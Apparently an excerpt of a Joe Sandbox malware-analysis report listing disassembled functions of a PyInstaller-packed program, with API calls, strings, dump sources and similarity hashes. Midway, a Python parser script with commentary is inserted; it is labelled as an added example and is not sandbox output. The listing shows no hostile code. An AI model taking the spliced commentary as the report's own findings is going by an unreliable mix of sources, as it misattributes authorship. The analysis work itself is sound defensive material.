                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8502C632A0AB8281E7A4AF15E4407BD77A1FB84B84F48813ADB8D477A9DF3CE545C701
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B750906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction ID: 9fe932e7894e609dc6cbd0b8133375de173c3dd386a6ad6ff7ae69a523ee9496
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26419E63B1D68281EA309B1AA5106BA73A5FB85BC8F444135DF8D97BE9DF3CE501CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00007FFE01366A2E
                                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFE0136672E
                                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00007FFE01366705
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                              • API String ID: 4225454184-272990098
                                                                                                                                                                                                                                              • Opcode ID: e106108478e0651f8ddcd15e3868f0302f0a4d72454fda0a44bbba454c54d922
                                                                                                                                                                                                                                              • Instruction ID: df3edeea58f236480df521415e573ea3b17efda43eff893cb034913c96ae2533
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e106108478e0651f8ddcd15e3868f0302f0a4d72454fda0a44bbba454c54d922
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD1F1E2A09B8282EB25CB16D4556BD7BA1FB85BC4F468135DE5E0B7A5DF3CE441C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetCurrentProcess.KERNEL32 ref: 00007FF6B7508590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: OpenProcessToken.ADVAPI32 ref: 00007FF6B75085A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.ADVAPI32 ref: 00007FF6B75085C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetLastError.KERNEL32 ref: 00007FF6B75085D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.ADVAPI32 ref: 00007FF6B7508612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B750862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: CloseHandle.KERNEL32 ref: 00007FF6B7508646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B750916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B7509175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction ID: b448f9862ad4b2578966b4992cc4363d812fab8a517ea80ecd4279cba33f4c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE212D72A0CB8295F650AB14E5156EA6361FF88784F444036EB4DD37E6DF3CE9458780
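The function entries above are machine-generated and repeat the same five fields per function (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easier to triage by script than by eye. The following Python script is an added example; it is not part of the Joe Sandbox report and not Joe Sandbox code. It parses entries in this layout into one record per function (direct API calls and subcall calls with their parent address, string xrefs, memory dump sources and the Similarity fields) so that, for instance, the token-handling function above can be located by the set of APIs it reaches. The sample text is constructed from two of the entries shown above; the record field names and the helper functions are this script's own naming, not the report's.

```python
"""Parse Joe Sandbox function entries (as listed above) into records.

Added example, not part of the report. Section header names and the
'Instruction Fuzzy Hash' line that closes an entry follow the page layout;
the record keys ('apis', 'strings', 'dumps', 'meta') are this script's own.
"""
import re
from typing import Dict, List

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "• Part of subcall function ADDR: Name.MODULE ... ref: ADDR"
SUBCALL_RE = re.compile(r"•\s*Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*"
                        r"(?P<name>\w+)\.(?P<module>\w+)")
# "• Name.MODULE(args), ref: ADDR"
API_RE = re.compile(r"•\s*(?P<name>\w+)\.(?P<module>\w+).*?ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "• <string>, xrefs: ADDR"
STRING_RE = re.compile(r"•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xref>[0-9A-Fa-f]+)")
# "• Key: value" (dump sources, snapshot file, Similarity fields)
KV_RE = re.compile(r"•\s*(?P<key>[^:]+):\s*(?P<value>.*)")


def _new_entry() -> Dict:
    return {"apis": [], "strings": [], "dumps": [], "meta": {}}


def parse_entries(text: str) -> List[Dict]:
    """One record per function; an entry ends at its 'Instruction Fuzzy Hash' line."""
    entries: List[Dict] = []
    cur = _new_entry()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = SUBCALL_RE.match(line)
            if m:  # call made by a callee of this function, not by the function itself
                cur["apis"].append({"api": f"{m['name']}.{m['module']}",
                                    "direct": False, "parent": m["parent"]})
                continue
            m = API_RE.match(line)
            if m:
                cur["apis"].append({"api": f"{m['name']}.{m['module']}",
                                    "direct": True, "ref": m["ref"]})
                continue
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                cur["strings"].append((m["text"], m["xref"]))
                continue
        m = KV_RE.match(line)
        if m:
            key, value = m["key"].strip(), m["value"].strip()
            if key in ("Source File", "Associated"):
                cur["dumps"].append(value)
            else:
                cur["meta"][key] = value
            if key == "Instruction Fuzzy Hash":  # last field of every entry
                entries.append(cur)
                cur = _new_entry()
    return entries


def string_ids(entry: Dict) -> List[str]:
    """Split the Similarity 'String ID' field, which the report joins with '$'."""
    return [s for s in entry["meta"].get("String ID", "").split("$") if s]


def entries_calling(entries: List[Dict], wanted: set) -> List[Dict]:
    """Entries whose API set (direct or via subcall) covers every API in `wanted`."""
    return [e for e in entries if wanted <= {a["api"] for a in e["apis"]}]


# Constructed sample: two entries copied from the listing above, shortened.
SAMPLE = """\
APIs
  • Part of subcall function 00007FF6B7508570: GetCurrentProcess.KERNEL32 ref: 00007FF6B7508590
  • Part of subcall function 00007FF6B7508570: OpenProcessToken.ADVAPI32 ref: 00007FF6B75085A3
  • Part of subcall function 00007FF6B7508570: GetTokenInformation.ADVAPI32 ref: 00007FF6B75085C8
  • Part of subcall function 00007FF6B7508570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B750862E
  • Part of subcall function 00007FF6B7508570: CloseHandle.KERNEL32 ref: 00007FF6B7508646
• LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B750916C
• LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B7509175
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Instruction Fuzzy Hash: DE212D72A0CB8295F650AB14E5156EA6361FF88784F444036EB4DD37E6DF3CE9458780
APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 00007FFE01366A2E
• foreign key on %s should reference only one column of table %T, xrefs: 00007FFE01366705
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Similarity
• API String ID: 4225454184-272990098
• Instruction Fuzzy Hash: 8BD1F1E2A09B8282EB25CB16D4556BD7BA1FB85BC4F468135DE5E0B7A5DF3CE441C300
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e["meta"].get("API String ID"), [a["api"] for a in e["apis"]], string_ids(e))
```

Run over the full report text instead of SAMPLE, `entries_calling` with a set such as `{"OpenProcessToken.ADVAPI32", "ConvertSidToStringSidW.ADVAPI32"}` returns every function that reaches the token-to-SID sequence, and `string_ids` gives the Similarity strings as a list so they can be grepped or matched against a rule without the `$` joining.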
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                              • Instruction ID: 60b03a799f6db5aed12a9fdf19419178b4bea0e7d4f402f1cd5e2f1220cbba0d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AED1CD72B0878586EB60DF29E0447A9B7A1FB94B94F564032DE8D4B7A4EF3CD940CB41
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: 1b6fb42ce5781a95a3f00f5674bc150965e2f73fdbac7012c130e31c6e47e7c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F731D623B1C68552E7209B69A8506EA6394BF887D8F400136FF8DC3769EF3CD546C600
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction ID: 4f478c84f023a6a7181d3303189d0353c13e641d5c7a72d187cd9806adca5729
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1313D73A1DA8289EB209F29E8552F96360FF88788F440135EB4D8BB69DF3CD105C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B750918F,?,00007FF6B7503C55), ref: 00007FF6B7502BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6B7502C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction ID: da72ecbf80f5627dc225b90cb88e59fe1ea355414a45e7108239bb43256e7ea2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3121A16370CB8142E7219B58F8447EA73A4FB88784F400136EF8D97665EE3CE645C740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B7501B99), ref: 00007FF6B7502760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction ID: d27cc552cf225ce873c0c471e34702811d2bfd65f2871a6c7cb8a80559a5c1e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5218173A1CB8142E7209B58B8417EA63A4FB88384F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction ID: c11d35822f8e28045bc73a05a74d7cffedf6ea7700be129f990a706eb62ee28a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06263B0DB4681EA108B28E48477A6330AF45761F540239D7AE865F4EF2CE188C340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction ID: 0b5d01ae10140f2002900cd2911e13b10286858eadec77d9e4a0ea4370827437
• Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction Fuzzy Hash: C0111F23E5CA0F42FA68136EE4A63791150AF69364F144634EBAEF67FACF6CA8414100
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3AF
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3CE
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3F6
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B407
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B418
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
• Instruction ID: a25641608412af6962b6f90a1162dd7dc15549389ad82ead16ff0720a206439a
• Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
• Instruction Fuzzy Hash: 7D119622F0DA2241F9559B2E594117962925F44BB2F488334DB7EC6EF6DD2CF8418300
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
• Instruction ID: 2261d46ceb3bc7d2e9bc78e71854b9d4c6a5248508228b0b8a68ee9704f7abe9
• Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
